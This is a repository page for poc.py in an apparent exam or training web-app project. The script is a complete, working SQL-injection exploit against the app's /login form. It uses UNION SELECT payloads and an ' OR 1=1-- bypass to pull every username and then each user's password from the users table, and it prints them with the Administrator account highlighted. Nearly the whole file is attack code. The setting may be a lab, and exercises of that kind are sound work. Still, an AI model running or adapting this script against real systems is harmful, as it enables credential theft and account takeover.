OkunElya/PC-Seq-Exam-WebApp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
85083c9f1534145fac45c1a13f05254daf780a5f
PC-Seq-Exam-WebApp/poc.py

40 lines
1.6 KiB
Python
Executable File
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

#!/usr/bin/env python3
import requests
import re
import argparse
parser = argparse.ArgumentParser(description="Exploit script for extracting logins and passwords.")
parser.add_argument("--base-url", default="http://localhost:80", help="Base URL of the target application")
args = parser.parse_args()
BASE_URL = args.base_url
login_payload = "' UNION SELECT login FROM (Select * from users ORDER BY id)--"
form_data = {"login": login_payload, "password": "' OR 1=1--"}
response_logins = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)
logins_raw = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_logins.text).group(1)
logins= logins_raw.split("',), ('")
passwords=[]
for login in logins:
password_payload = f"' UNION SELECT password FROM (Select * from users WHERE login='{login}')--"
form_data = {"login": password_payload, "password": "' OR 1=1--"}
response_password = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)
password = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_password.text).group(1)
passwords.append(password)
if logins and passwords:
for i, (login, password) in enumerate(zip(logins, passwords)):
if login == "Administrator":
print(f"{'*' * 60}")
print(f" {i+1}. Логин: {login:<20} Пароль: {password} <-- !!! ВАЖНО !!!")
print(f"{'*' * 60}")
else:
print(f" {i+1}. Логин: {login:<20} Пароль: {password}")
else:
print("Не удалось извлечь данные.")
Reference in New Issue View Git Blame Copy Permalink